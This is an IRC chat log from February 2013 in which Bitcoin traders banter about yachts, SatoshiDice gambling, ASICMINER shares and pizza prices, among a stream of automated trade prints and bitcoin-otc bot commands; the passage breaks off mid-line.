BTC [+] Feb 09 00:48:48 for Japan... or anything Feb 09 00:49:13 pfft, sealand.. who cares about pieceof concrete in middel of nowhere? Feb 09 00:49:23 its dea dnot Feb 09 00:49:26 to my knoweldge Feb 09 00:49:49 buy normal yacht with place for few tables, do mediterranean cruises,... Feb 09 00:50:07 *rent Feb 09 00:50:42 fuck, sound like a plan Feb 09 00:52:18 http://www.stunningyachts.com/yacht_details.php?pid=610 Feb 09 00:52:48 S.DICE was earning about that much last month Feb 09 00:52:50 :-) Feb 09 00:53:25 I'm sure there are better deals though Feb 09 00:54:33 oh man I wish I had a yachy Feb 09 00:54:42 this yacht Feb 09 00:55:25 so the casion should make 7000 btc per week to pay for this beauty Feb 09 00:55:30 sounds doable Feb 09 00:55:48 (at btceur=15) Feb 09 00:56:09 A much better deal here Feb 09 00:56:10 http://www.stunningyachts.com/yacht_details.php?pid=2243 Feb 09 00:56:23 only $60,000 /wk Feb 09 00:56:32 but not in St. Tropez Feb 09 00:56:43 ;;ticker Feb 09 00:56:44 BTCUSD ticker | Best bid: 22.63185, Best ask: 22.70000, Bid-ask spread: 0.06815, Last trade: 22.63185, 24 hour volume: 48640.66523893, 24 hour low: 22.00000, 24 hour high: 22.70000, 24 hour vwap: 22.39561 Feb 09 00:56:54 yesss Feb 09 00:57:12 oh that will be american subsidiary Feb 09 00:59:56 we have a baby whale playing Feb 09 00:59:57 http://blockchain.info/address/1EAwKCEhyBcsZrZUPKYw8M4Lb8VM7Y1ep6 Feb 09 01:00:55 jurov why a ship ? Feb 09 01:01:09 why not? Feb 09 01:01:19 what's wrong with just as things are ? Feb 09 01:01:25 must stop looking at blocks Feb 09 01:01:28 i mean yachts Feb 09 01:01:44 Bugpowder sure better than teslas. Feb 09 01:02:02 I am not rich enough for a yacht Feb 09 01:02:05 load a boat with party girls, go for vacation Feb 09 01:02:09 Yah Feb 09 01:02:16 A week rental Feb 09 01:02:38 I have a friend in HK with a nice boat Feb 09 01:02:41 ship+casinos are cool... now imagine one with btc flag hoisted Feb 09 01:03:02 jurov ship with hookers&blow are cool Feb 09 01:03:10 bitcoins don't need you to be stuck on a ship Feb 09 01:03:19 oh these will appear themselves Feb 09 01:03:49 speaking of which, i'm going off. catch you all later! Feb 09 01:04:03 later Feb 09 01:04:21 mp, you get all worked up thinking of hookers and blow? Feb 09 01:04:50 not loving my puts purchase Feb 09 01:05:25 jborkl not me. the hookers. Feb 09 01:06:34 Yeah, hookers and blow go together like straberries and chocolate Feb 09 01:06:35 btc don;t need ship. but i want to do things with btc irl, nut just be forever stuck here showing biggest epeen Feb 09 01:06:48 kbd fail Feb 09 01:09:08 [BTCTC] [GSDPT] 10 @ 0.0059 = 0.059 BTC [-] Feb 09 01:09:21 [BTCTC] [GSDPT] 45 @ 0.0058 = 0.261 BTC [-] Feb 09 01:09:22 [BTCTC] [GSDPT] 1200 @ 0.0058 = 6.96 BTC [-] Feb 09 01:09:33 [BTCTC] [GSDPT] 23 @ 0.0056 = 0.1288 BTC [-] Feb 09 01:09:49 [BTCTC] [GSDPT] 1000 @ 0.0052 = 5.2 BTC [-] **** BEGIN LOGGING AT Sat Feb 9 09:03:19 2013 Feb 09 09:04:13 [MPEX] [S.DICE] 1278 @ 0.006 = 7.668 BTC [-] Feb 09 09:04:42 a, back to 60 are we Feb 09 09:06:04 yeap. the 5xx was an eyesore Feb 09 09:07:02 [MPEX] [S.MPOE] 18200 @ 0.00066663 = 12.1327 BTC [+] Feb 09 09:07:04 [MPEX] [S.MPOE] 8809 @ 0.00066596 = 5.8664 BTC [-] Feb 09 09:07:11 [MPEX] [S.MPOE] 10000 @ 0.00066562 = 6.6562 BTC [-] Feb 09 09:07:15 [MPEX] [S.MPOE] 23500 @ 0.00066544 = 15.6378 BTC [-] Feb 09 09:07:17 [MPEX] [S.MPOE] 17600 @ 0.00066404 = 11.6871 BTC [-] Feb 09 09:07:29 [MPEX] [S.MPOE] 10494 @ 0.00066395 = 6.9675 BTC [-] Feb 09 09:07:31 [MPEX] [S.MPOE] 2892 @ 0.00066395 = 1.9201 BTC [-] Feb 09 09:10:27 so basically these two are converging lol Feb 09 09:12:07 the baby whale is down to 18k from 29k earlier Feb 09 09:12:15 baby whale ;/ Feb 09 09:12:17 poor him. Feb 09 09:12:19 i hope we dont scare the whale too much Feb 09 09:18:14 well i hope at least hes getting high for playing dice at least Feb 09 09:18:18 it doesnt seem like a bot Feb 09 09:25:13 lol Feb 09 09:25:20 should get pretty high for 10k Feb 09 09:25:37 tho in his defense this is better than "investing" in mining Feb 09 09:25:48 he only lost 1/3 of his money and it didn't take three months. Feb 09 09:26:24 [MPEX] [S.MPOE] 19795 @ 0.00067031 = 13.2688 BTC [+] Feb 09 09:26:26 [MPEX] [S.MPOE] 2505 @ 0.00067267 = 1.685 BTC [+] Feb 09 09:27:46 see... imagine if those baby whales were multiplied by 50x from rich kids of instagram Feb 09 09:27:53 happy shareholders everywhere Feb 09 09:29:46 The company that supplied electricity to the Super Bowl says the blackout that halted the big game was caused by a device it installed specially to prevent a power failure. Feb 09 09:33:16 [MPEX] [S.MPOE] 8450 @ 0.00067267 = 5.6841 BTC [+] Feb 09 09:43:06 power ownage Feb 09 09:46:48 anyone else having issues with coinbr? is it a bitvps thing ? Feb 09 09:47:58 http://live.coinbr.com/?mpsic=S.MPOE just loaded that Feb 09 09:49:48 [MPEX] [S.MPOE] 28100 @ 0.00066833 = 18.7801 BTC [-] Feb 09 09:49:50 [MPEX] [S.MPOE] 1000 @ 0.00066396 = 0.664 BTC [-] Feb 09 09:50:03 [MPEX] [S.MPOE] 6585 @ 0.00066395 = 4.3721 BTC [-] Feb 09 09:50:09 [MPEX] [S.MPOE] 16614 @ 0.00066341 = 11.0219 BTC [-] Feb 09 09:50:20 [MPEX] [S.MPOE] 23817 @ 0.00066273 = 15.7842 BTC [-] Feb 09 09:50:24 [MPEX] [S.MPOE] 10387 @ 0.00066053 = 6.8609 BTC [-] Feb 09 09:50:42 everyone must be sleeping Feb 09 09:52:36 weird Feb 09 09:53:05 i just get connection timed out Feb 09 09:53:08 "The server at live.coinbr.com is taking too long to respond." Feb 09 09:57:31 routing issue maybe ? Feb 09 09:57:35 maybe its broken Feb 09 09:58:10 [MPEX] [S.MPOE] 11277 @ 0.00067267 = 7.5857 BTC [+] Feb 09 09:58:13 [MPEX] [S.MPOE] 3634 @ 0.00067738 = 2.4616 BTC [+] Feb 09 09:58:47 i just loaded it again. seems fine. Feb 09 10:00:49 [MPEX] [S.MPOE] 6266 @ 0.00067738 = 4.2445 BTC [+] Feb 09 10:00:51 [MPEX] [S.MPOE] 6584 @ 0.00069207 = 4.5566 BTC [+] Feb 09 10:01:00 any more reddit complaints mp? Feb 09 10:07:02 [MPEX] [S.MPOE] 18800 @ 0.00066568 = 12.5148 BTC [-] Feb 09 10:16:27 [MPEX] [S.MPOE] 8200 @ 0.00066568 = 5.4586 BTC [-] Feb 09 10:17:41 i haven't been watching. are there ? Feb 09 10:17:53 [MPEX] [S.MPOE] 133 @ 0.00066568 = 0.0885 BTC [-] Feb 09 10:17:55 [MPEX] [S.MPOE] 1763 @ 0.00066053 = 1.1645 BTC [-] Feb 09 10:18:01 [MPEX] [S.MPOE] 9750 @ 0.00066053 = 6.4402 BTC [-] Feb 09 10:18:03 [MPEX] [S.MPOE] 13554 @ 0.00065996 = 8.9451 BTC [-] Feb 09 10:19:34 [MPEX] [S.MPOE] 7196 @ 0.00065996 = 4.7491 BTC [-] Feb 09 10:19:36 [MPEX] [S.MPOE] 9304 @ 0.00065961 = 6.137 BTC [-] Feb 09 10:21:30 [MPEX] [S.MPOE] 696 @ 0.00065961 = 0.4591 BTC [-] Feb 09 10:21:32 [MPEX] [S.MPOE] 20000 @ 0.00065923 = 13.1846 BTC [-] Feb 09 10:21:37 [MPEX] [S.MPOE] 5104 @ 0.00065896 = 3.3633 BTC [-] Feb 09 10:24:31 [BTCTC] [GSDPT] 1 @ 0.0061 BTC [+] Feb 09 10:25:28 [MPEX] [S.MPOE] 13500 @ 0.00065896 = 8.896 BTC [-] Feb 09 10:29:29 [MPEX] [S.MPOE] 21800 @ 0.00066936 = 14.592 BTC [+] Feb 09 10:35:25 [MPEX] [S.MPOE] 1896 @ 0.00065896 = 1.2494 BTC [-] Feb 09 10:35:27 [MPEX] [S.MPOE] 15350 @ 0.00065706 = 10.0859 BTC [-] Feb 09 10:35:29 [MPEX] [S.MPOE] 13304 @ 0.00065502 = 8.7144 BTC [-] Feb 09 10:39:30 [MPEX] [S.MPOE] 10991 @ 0.00065502 = 7.1993 BTC [-] Feb 09 10:39:33 [MPEX] [S.MPOE] 10000 @ 0.00065468 = 6.5468 BTC [-] Feb 09 10:56:20 http://trilema.com/2013/the-trolling-something-awful-competition/ Feb 09 10:56:24 if anyone's interested... Feb 09 10:57:32 i got this ! Feb 09 10:57:37 oh let me read Feb 09 10:57:53 truffles put it on reddit if you have an acct. Feb 09 10:57:57 let's spread the joy :D Feb 09 10:58:15 no acct Feb 09 10:58:41 [MPEX] [S.MPOE] 3600 @ 0.00065241 = 2.3487 BTC [-] Feb 09 10:58:43 [MPEX] [S.MPOE] 24400 @ 0.0006524 = 15.9186 BTC [-] Feb 09 10:58:48 [MPEX] [S.MPOE] 6731 @ 0.00065178 = 4.3871 BTC [-] Feb 09 10:58:57 prefer to lurk in certain forums, too many nazis Feb 09 10:59:09 hehe Feb 09 10:59:38 u got banned? Feb 09 11:00:49 well, technically mpoe-pr got me banned Feb 09 11:00:51 but yeah. Feb 09 11:01:40 tl dr? Feb 09 11:01:49 no such thing. Feb 09 11:03:35 so um i dont get it Feb 09 11:04:36 well internet trollery stuff isn't for everyone. Feb 09 11:04:59 how long is would one have to commit to this Feb 09 11:05:02 [MPEX] [S.MPOE] 3769 @ 0.00065178 = 2.4566 BTC [-] Feb 09 11:05:17 [MPEX] [S.MPOE] 10950 @ 0.00065101 = 7.1286 BTC [-] Feb 09 11:06:11 you don't stand a chance of success if you're not already very good at it. Feb 09 11:06:39 meh Feb 09 11:06:51 i wouldnt wanna be considered an excellent troll Feb 09 11:09:07 ofc i can be bought, so i will think it over, just spent the day doing clean win7 instal fml Feb 09 11:11:02 [BTCTC] [BASIC-MINING] 30 @ 0.3498 = 10.494 BTC [+] Feb 09 11:11:41 [BTCTC] [BASIC-MINING] 4 @ 0.3498 = 1.3992 BTC [+] Feb 09 11:12:26 https://bitcointalk.org/index.php?topic=142038.0 Feb 09 11:12:27 I wish. Feb 09 11:13:31 truffles so move to linux Feb 09 11:14:23 yea.. but i dont know how to use it so i will have to learn that 1st Feb 09 11:15:17 how many years til asic become meaningless? Feb 09 11:15:47 truffles: never Feb 09 11:15:50 they never will. asic is the end game technology. asic simply means, specially made chip Feb 09 11:16:00 the question you meant to ask was Feb 09 11:16:01 on the other hand, the current crop of crap will be lucky to get 6 months,. Feb 09 11:16:04 when do new asics kill old asics Feb 09 11:16:11 about a year. Feb 09 11:16:17 assuming anyone makes new asics Feb 09 11:16:30 just get a new pc each yr? Feb 09 11:16:59 someone would have to jump to 45nm to win Feb 09 11:19:39 Namworld: I bid on the other two lol Feb 09 11:19:58 Namworld: see any other threads selling asicminer shares? Feb 09 11:20:36 losing 30k real money in a play money arena, sick! Feb 09 11:21:48 Namworld: hopefully it'd start a bidding war on those Feb 09 11:22:05 I wish I had more money though, I'd just outbid everyone Feb 09 11:22:50 i guess if the difficulty increases could be good investment to get as much early as possible even if the new releases are faster Feb 09 11:22:56 this is the reason you don't have money : you waste it if you do. Feb 09 11:23:06 truffles it'd be cheaper to trade diff futures. Feb 09 11:23:42 or to let me gamble with it Feb 09 11:23:52 wouldve at least doubled that! Feb 09 11:25:06 diablo is it an investment or do u purchase a spare ? Feb 09 11:27:36 [MPEX] [S.MPOE] 7350 @ 0.00065101 = 4.7849 BTC [-] Feb 09 11:27:38 [MPEX] [S.MPOE] 20100 @ 0.00065058 = 13.0767 BTC [-] Feb 09 11:27:45 [MPEX] [S.MPOE] 4650 @ 0.0006494 = 3.0197 BTC [-] Feb 09 11:27:47 truffles: an investment Feb 09 11:29:27 risky still (depending on how much ure investing) if the asics dont increase with level of difficulty long term Feb 09 11:31:00 truffles: only about 250 btc, its not much Feb 09 11:31:10 orly Feb 09 11:31:41 [MPEX] [S.MPOE] 5600 @ 0.00065277 = 3.6555 BTC [+] Feb 09 11:35:50 [MPEX] [S.MPOE] 3059 @ 0.00065277 = 1.9968 BTC [+] Feb 09 11:36:09 how many pizzas could that get hmmm Feb 09 11:39:42 250*22.6=5650 USD, divided by 10 USD = 565 pizzas Feb 09 11:40:01 nom nom nom Feb 09 11:40:39 If you take frozen ones from the supermarket when they're in special, that's almost 2000 pizzas Feb 09 11:41:08 yea but we r only talking bitcoin pizzas Feb 09 11:41:21 enough to eat 3 pizzas a day for 2 years and die from heart diseases. Feb 09 11:41:34 ah, well I guess dominos Feb 09 11:41:42 10 USD. 565 BTC pizzas Feb 09 11:41:56 id want variety though Feb 09 11:42:06 Dominos has variety Feb 09 11:42:17 true Feb 09 11:42:18 Namworld: actually Feb 09 11:42:24 can u buy apples Feb 09 11:42:29 I got some for $4 that are normally $10 Feb 09 11:42:36 they were pretty good though Feb 09 11:42:39 omg Feb 09 11:42:50 I hate frozen pizza, but I tried them Feb 09 11:42:53 they wernt bad Feb 09 11:43:01 Some brands aren't bad Feb 09 11:43:06 Ive tried every band Feb 09 11:43:08 they're all shit Feb 09 11:43:11 ure letting go of possibly 3+ years of pizza then Feb 09 11:43:16 they usually ruin the sauce Feb 09 11:43:20 its all the same pizza! Feb 09 11:43:25 truffles: yes, but I can probably make this all back in 2 years. Feb 09 11:43:33 omg 2 years Feb 09 11:43:38 and I need it to fix DMC Feb 09 11:43:38 face palm Feb 09 11:44:08 Getting 100% over two year is excellent Feb 09 11:44:18 Although this might never happen Feb 09 11:44:34 dunno how the numbers work .. Feb 09 11:44:40 But the only mining stock that could achieve anything it seems is that ASICMINER Feb 09 11:44:59 It's a share of a manufacturer of mining hardware. Feb 09 11:45:09 can bitcoins buy apples anywhere Feb 09 11:45:31 Namworld: this is why I wished people shut up when I was selling dmc at massive discounts to get asicminer shares Feb 09 11:45:49 yeah, I did that trade Feb 09 11:45:59 it was worth every penny Feb 09 11:46:07 that sounds shady Feb 09 11:46:08 I should have kept my ASICMINERs Feb 09 11:46:35 yeah, but you should have sold DMC market price and just bought ASICMINERs yourself. Better deal Feb 09 11:46:35 but obv within ur rights to do Feb 09 11:46:43 no one was paying at market price Feb 09 11:46:56 I mean, I could have just crashed the market Feb 09 11:46:58 I guess Feb 09 11:46:59 that would have been hilarious Feb 09 11:47:22 can bitcoins buy apples (to eat) anywhere? Feb 09 11:49:59 Trade a bitcoin with someone for a 20 bill then buy an apple. Feb 09 11:50:21 direct payment Feb 09 11:50:55 [MPEX] [S.MPOE] 16971 @ 0.00066176 = 11.2307 BTC [+] Feb 09 11:50:55 Go at a bitcoiner's home and offer .10 BTC for an apple. Almost all will have apples in their fridges that have been there for a while Feb 09 11:51:28 knock knock oh hey doyou have bitcoins? Feb 09 11:51:40 or do you accept bitcoins here Feb 09 11:52:03 Namworld: you should have shut up about the other two threads though Feb 09 11:52:23 why would one pay .1 btc for an apple ?! Feb 09 11:52:26 diablo get him banned next time, win win Feb 09 11:52:45 not for namworld but for you and the ppl buying right Feb 09 11:52:46 Namworld: I was hoping to get outbid completely so I could drive the price up on the others as well Feb 09 11:53:32 Namworld: too bad I couldnt bid using those btc-mining shares =P Feb 09 11:54:10 [MPEX] [S.MPOE] 12000 @ 0.00066176 = 7.9411 BTC [+] Feb 09 11:54:48 "apple prices up,supplies down due to spring freezing" Feb 09 11:56:35 1 dollar a pound.. Feb 09 11:56:40 dunno the ratios there Feb 09 11:57:09 .1btc might be a bit much though Feb 09 11:58:30 inb4 inflation. USD priced like Yens Feb 09 11:58:52 Now each little thing would cost hundreds Feb 09 11:58:59 Hello DeaDTerra Feb 09 11:59:14 Seems like I'll be giving you a bit of competition Feb 09 12:01:13 [BTCTC] [S.MPOE-PT] 3 @ 0.0007 = 0.0021 BTC Feb 09 12:01:43 ok, sooo... anyone with a cc want to buy me $10 worth of shit for btc ? Feb 09 12:02:43 Hmm... no... no one would want to do that Feb 09 12:02:56 ... Feb 09 12:03:17 there is someone out there Feb 09 12:05:43 [MPEX] [S.MPOE] 1620 @ 0.00066176 = 1.0721 BTC [+] Feb 09 12:05:45 [MPEX] [S.MPOE] 14050 @ 0.00065024 = 9.1359 BTC [-] Feb 09 12:08:09 yeah Feb 09 12:08:16 Starting to get a bit of volume Feb 09 12:08:59 I came after the buying frenzy tho, mostly Feb 09 12:09:07 teh incredible, nobody wants to ?! Feb 09 12:09:17 wtf, at this rate i'm gonna have to go to -otc or some shit. Feb 09 12:09:51 5800 Feb 09 12:10:24 1200 vs 2291 for you on 24h Feb 09 12:10:37 I kind of arrived with the 0.0062 block Feb 09 12:10:38 btw i have 100 ASICMINER for sale too Feb 09 12:10:47 0.01 BTC each! Feb 09 12:10:50 lol Feb 09 12:10:56 noo Feb 09 12:11:03 will sell for the highest price =))) Feb 09 12:11:14 Have you seen the price of ASICMINERs, DeaDTerra? Feb 09 12:11:27 yeah Feb 09 12:11:37 i am selling mine for 1 btc each Feb 09 12:11:38 ! Feb 09 12:11:45 i bought dem at 0.1 Feb 09 12:11:49 Mine reach that and bids are now stalling. Feb 09 12:12:40 Eh Feb 09 12:12:51 ;;eauth mircea_popescu Feb 09 12:12:54 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Feb 09 12:12:55 hey any1 live near microcenter? Feb 09 12:12:57 pm me if u do Feb 09 12:13:03 >,> Feb 09 12:13:23 ;;everify freenode:#bitcoin-otc:5dd4230e960e50c19473c23984b92b1ae018141c36129dd0ef3a615f Feb 09 12:13:24 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Feb 09 12:13:37 what's gribble's tradebook syntax again ? Feb 09 12:13:44 1.4 million, not bad Feb 09 12:15:26 Do you push shares to MPEx on requests? Feb 09 12:15:37 Thought so Feb 09 12:15:55 So will I. I see people buying 10s of Ks tho Feb 09 12:16:01 ;;buy "1 SA gift cert" for .5 BTC (You will have to make a 9.95 credit card payment on https://secure.somethingawful.com/products/gift-certificate.php?product_type=register ) Feb 09 12:16:02 Error: '1 SA gift cert' is not a valid positive floating point number. Feb 09 12:16:04 Not sure why they don't take an MPEx account Feb 09 12:16:06 doh Feb 09 12:16:11 ;;buy 1 "SA gift cert" for .5 BTC (You will have to make a 9.95 credit card payment on https://secure.somethingawful.com/products/gift-certificate.php?product_type=register ) Feb 09 12:16:12 Error: 'for' is not a valid price input. Feb 09 12:16:25 ;;buy 1 "SA gift cert" .5 BTC (You will have to make a 9.95 credit card payment on https://secure.somethingawful.com/products/gift-certificate.php?product_type=register ) Feb 09 12:16:26 Order id 13393 created. Feb 09 12:16:30 ;;list 13393 Feb 09 12:16:31 Error: '13393' is not a valid plugin. Feb 09 12:17:00 ;;order 13393 Feb 09 12:17:03 Error: "order" is not a valid command. Feb 09 12:17:11 I guess if they can't be bothered with command line or 30 BTC fee Feb 09 12:18:32 Possibly... I might undermine your passthrough tho. I see occasional dumps. I might put bids on it =P Feb 09 12:18:37 and ask for transfers =/ Feb 09 12:18:53 Wherever cheap shares are... Feb 09 12:19:06 lol command fails Feb 09 12:20:19 ;;view 13393 Feb 09 12:20:20 #13393 Sat Feb 9 02:16:26 2013 mircea_popescu BUY 1.0 SA gift cert @ 0.5 BTC ((You will have to make a 9.95 credit card payment on https://secure.somethingawful.com/products/gift-certificate.php?product_type=register )) Feb 09 12:20:25 Yeah, would probably be at least 5k or more Feb 09 12:20:36 otherwise I'll try to resell through the passthrough Feb 09 12:21:12 [MPEX] [S.MPOE] 12363 @ 0.00064998 = 8.0357 BTC [-] Feb 09 12:21:13 [MPEX] [S.MPOE] 13200 @ 0.00066409 = 8.766 BTC [+] Feb 09 12:21:26 [MPEX] [S.MPOE] 6237 @ 0.00066417 = 4.1424 BTC [+] Feb 09 12:21:46 someone be a darling and go ;;view 13393 in #bitcoin-otc Feb 09 12:21:50 [BTCTC] [GSDPT] 5 @ 0.0061 = 0.0305 BTC [+] Feb 09 12:24:23 works Feb 09 12:27:39 It has caught a fish Feb 09 12:27:42 Reeling in Feb 09 12:28:11 Looks more like a raccoon but anyway Feb 09 12:29:54 [BTCTC] [S.MPOE-PT] 2 @ 0.0007 = 0.0014 BTC Feb 09 12:29:57 lol what ?! Feb 09 12:32:13 Has the said raccoon not PMed you? Feb 09 12:33:10 yes a few ppl have Feb 09 12:33:13 and i'm doing it with all :) Feb 09 12:33:25 tyvm for posting it there Namworld Feb 09 12:35:24 [MPEX] [S.MPOE] 24500 @ 0.00065924 = 16.1514 BTC [-] Feb 09 12:35:29 [MPEX] [S.MPOE] 2250 @ 0.00065461 = 1.4729 BTC [-] Feb 09 12:36:11 ;;rate petertodd 1 bought me SA gift cert. Feb 09 12:36:13 Rating entry successful. Your rating of 1 for user petertodd has been recorded. Feb 09 12:37:06 lol... paying yourself some "entertainment" tickets? Feb 09 12:37:48 yup. Feb 09 12:37:57 what's the point of being rich if you're not gonna have fun ? Feb 09 12:38:23 I wonder Feb 09 12:39:55 ;;rate PochiRaccoon 1 bought me SA gift cert. Feb 09 12:39:57 Rating entry successful. Your rating of 1 for user PochiRaccoon has been recorded. Feb 09 12:39:57 oh but u couldnt buy it with playmonies Feb 09 12:45:51 ah this is fun. Feb 09 12:54:17 [MPEX] [S.MPOE] 11150 @ 0.0006602 = 7.3612 BTC [+] Feb 09 12:54:19 [MPEX] [S.MPOE] 10600 @ 0.00066417 = 7.0402 BTC [+] Feb 09 12:58:01 [MPEX] [S.MPOE] 19650 @ 0.00066256 = 13.0193 BTC [-] Feb 09 13:01:30 keep us updated =/ Feb 09 13:09:37 [MPEX] [S.MPOE] 8904 @ 0.00066256 = 5.8994 BTC [-] Feb 09 13:09:46 [MPEX] [S.MPOE] 11046 @ 0.00066417 = 7.3364 BTC [+] Feb 09 13:16:10 [MPEX] [S.DICE] 1000 @ 0.00619995 = 6.2 BTC [+] Feb 09 13:16:12 [MPEX] [S.DICE] 6512 @ 0.00619996 = 40.3741 BTC [+] Feb 09 13:16:23 [MPEX] [S.DICE] 2000 @ 0.00619997 = 12.3999 BTC [+] Feb 09 13:16:24 [MPEX] [S.DICE] 30611 @ 0.00619998 = 189.7876 BTC [+] Feb 09 13:16:32 [MPEX] [S.DICE] 50218 @ 0.00619999 = 311.3511 BTC [+] Feb 09 13:16:38 [MPEX] [S.DICE] 1000000 @ 0.0062 = 6200 BTC [+] Feb 09 13:16:40 [MPEX] [S.DICE] 1144 @ 0.00639987 = 7.3215 BTC [+] Feb 09 13:16:41 [MPEX] [S.DICE] 8515 @ 0.0064 = 54.496 BTC [+] Feb 09 13:17:07 a well then there goes that thing... Feb 09 13:17:34 [MPEX] [S.MPOE] 1017 @ 0.00066417 = 0.6755 BTC [+] Feb 09 13:17:36 [MPEX] [S.MPOE] 20300 @ 0.00066435 = 13.4863 BTC [+] Feb 09 13:17:52 [MPEX] [S.MPOE] 4583 @ 0.0006662 = 3.0532 BTC [+] Feb 09 13:18:08 LOL Feb 09 13:18:35 evoorhees might now heed my advice and just put the next slices and leave them there Feb 09 13:21:26 I have 4 ft of snow on the deck. Feb 09 13:21:29 and btc is 23 Feb 09 13:21:31 what a night Feb 09 13:22:00 hehe Feb 09 13:22:02 [MPEX] [S.MPOE] 18393 @ 0.0006662 = 12.2534 BTC [+] Feb 09 13:22:10 [MPEX] [S.MPOE] 6100 @ 0.00066755 = 4.0721 BTC [+] Feb 09 13:22:11 [MPEX] [S.MPOE] 5000 @ 0.00066932 = 3.3466 BTC [+] Feb 09 13:22:12 [MPEX] [S.MPOE] 14100 @ 0.00066936 = 9.438 BTC [+] Feb 09 13:22:19 [MPEX] [S.MPOE] 59500 @ 0.00067011 = 39.8715 BTC [+] Feb 09 13:22:22 [MPEX] [S.MPOE] 10350 @ 0.00067157 = 6.9507 BTC [+] Feb 09 13:22:23 [MPEX] [S.MPOE] 13200 @ 0.00067369 = 8.8927 BTC [+] Feb 09 13:22:25 [MPEX] [S.MPOE] 15950 @ 0.00067534 = 10.7717 BTC [+] Feb 09 13:22:30 [MPEX] [S.MPOE] 12122 @ 0.00067738 = 8.2112 BTC [+] Feb 09 13:22:32 [MPEX] [S.MPOE] 28114 @ 0.00067834 = 19.0709 BTC [+] Feb 09 13:22:34 [MPEX] [S.MPOE] 6750 @ 0.00068018 = 4.5912 BTC [+] Feb 09 13:22:36 [MPEX] [S.MPOE] 17800 @ 0.00068107 = 12.123 BTC [+] Feb 09 13:22:37 [MPEX] [S.MPOE] 11500 @ 0.00068437 = 7.8703 BTC [+] Feb 09 13:22:39 [MPEX] [S.MPOE] 8289 @ 0.00069125 = 5.7298 BTC [+] Feb 09 13:22:40 [MPEX] [S.MPOE] 2016 @ 0.00069207 = 1.3952 BTC [+] Feb 09 13:22:42 [MPEX] [S.MPOE] 5000 @ 0.00069416 = 3.4708 BTC [+] Feb 09 13:22:43 [MPEX] [S.MPOE] 15069 @ 0.00069417 = 10.4604 BTC [+] Feb 09 13:22:45 [MPEX] [S.MPOE] 24400 @ 0.00069437 = 16.9426 BTC [+] Feb 09 13:22:47 [MPEX] [S.MPOE] 3233 @ 0.00069506 = 2.2471 BTC [+] Feb 09 13:22:49 [MPEX] [S.MPOE] 1000 @ 0.00069517 = 0.6952 BTC [+] Feb 09 13:22:50 [MPEX] [S.MPOE] 1200 @ 0.00069517 = 0.8342 BTC [+] Feb 09 13:22:57 [MPEX] [S.MPOE] 10000 @ 0.00069532 = 6.9532 BTC [+] Feb 09 13:23:00 and MPEx stock is going well to top it Feb 09 13:23:01 [MPEX] [S.MPOE] 33673 @ 0.00069533 = 23.4138 BTC [+] Feb 09 13:23:01 [MPEX] [S.MPOE] 16308 @ 0.00069566 = 11.3448 BTC [+] Feb 09 13:23:02 o hey, buying continues Feb 09 13:23:03 [MPEX] [S.MPOE] 12300 @ 0.00069772 = 8.582 BTC [+] Feb 09 13:23:10 [MPEX] [S.MPOE] 14850 @ 0.00069848 = 10.3724 BTC [+] Feb 09 13:23:12 [MPEX] [S.MPOE] 5000 @ 0.00069955 = 3.4978 BTC [+] Feb 09 13:23:14 [MPEX] [S.MPOE] 27137 @ 0.00069956 = 18.984 BTC [+] Feb 09 13:23:14 Someone had a few spare BTC Feb 09 13:23:18 [MPEX] [S.MPOE] 10473 @ 0.00069998 = 7.3309 BTC [+] Feb 09 13:23:20 [MPEX] [S.MPOE] 130000 @ 0.00069999 = 90.9987 BTC [+] Feb 09 13:23:30 [MPEX] [S.MPOE] 1811173 @ 0.0007 = 1267.8211 BTC [+] Feb 09 13:23:44 what's this, like 10k total huh Feb 09 13:24:20 Maybe more 8.5k Feb 09 13:24:48 6.2k + 1.2k + a couple of 1-20 Feb 09 13:24:59 i see 300, 189 etc Feb 09 13:25:03 +190 + 300 Feb 09 13:25:06 but yeah, 9kish Feb 09 13:26:55 did we seriously hit 23 Feb 09 13:26:56 wtf Feb 09 13:27:02 haha Feb 09 13:27:15 someone stop this rally or s.dice will be worth shit Feb 09 13:27:30 how do you figure ? Feb 09 13:27:31 ;;ticker Feb 09 13:27:32 BTCUSD ticker | Best bid: 23.10404, Best ask: 23.29997, Bid-ask spread: 0.19593, Last trade: 23.10202, 24 hour volume: 36833.45264397, 24 hour low: 22.22000, 24 hour high: 23.40000, 24 hour vwap: 22.68361 Feb 09 13:27:47 suppose we go to the moon Feb 09 13:27:51 yeah Feb 09 13:27:52 1 btc = 500 dollars Feb 09 13:28:01 how much did we pay for S.Dice again? Feb 09 13:28:10 I'll sell 200 BTC and retire Feb 09 13:28:14 1.6 dollars each by todays standards Feb 09 13:28:14 xD Feb 09 13:28:21 !ticker m s.dice Feb 09 13:28:23 [MPEX:S.DICE] 1D: 0.004321 / 0.00618952 / 0.0064 (1239961 shares, 7,674.77 BTC), 7D: 0.0042 / 0.005829 / 0.007395 (4614610 shares, 26,898.59 BTC), 30D: 0.00085848 / 0.00548477 / 0.0075 (9062644 shares, 49,706.54 BTC) Feb 09 13:28:30 But.. What if.. what iff Feb 09 13:28:32 like 545k btc on avg prices. Feb 09 13:28:37 I mean Feb 09 13:28:52 What do you think will happen to the volume Feb 09 13:29:10 i have no idea. maybe it drops, maybe the huge btc market cap encourages some large whale to get involved Feb 09 13:29:40 [HAVELOCK] [SDICE] 10 @ 0.62 = 6.2 BTC [+] Feb 09 13:29:53 it all boils down if S.Dice can keep up with BTC price appreciation Feb 09 13:30:11 in principle btc getting bigger isn't necessarily a bad thing Feb 09 13:30:22 why do you think everyone who wants to play on sdice already does ? Feb 09 13:30:50 not everyones heard of dice Feb 09 13:30:59 right. Feb 09 13:31:03 im not sure if erik will take my suggestion seriously Feb 09 13:31:32 he said it was a good idea, dunno if he was gonna go thru advertising on rkoi Feb 09 13:32:13 what's rkoi ? Feb 09 13:32:22 rich kids of instagram Feb 09 13:33:29 no idea wtf that is but anyway Feb 09 13:36:02 [MPEX] [S.MPOE] 30901 @ 0.00067494 = 20.8563 BTC [-] Feb 09 13:39:42 Total Received $ 322,730.90 Final Balance $ 13,647.46 Feb 09 13:40:02 [MPEX] [S.MPOE] 25995 @ 0.000669 = 17.3907 BTC [-] Feb 09 13:40:05 Our baby whale has been gambling non stop. I will weep for his money and celebrate the profits later Feb 09 13:40:15 I love all pennies equally Feb 09 13:41:09 [MPEX] [S.MPOE] 60000 @ 0.000669 = 40.14 BTC [-] Feb 09 13:41:50 [MPEX] [S.MPOE] 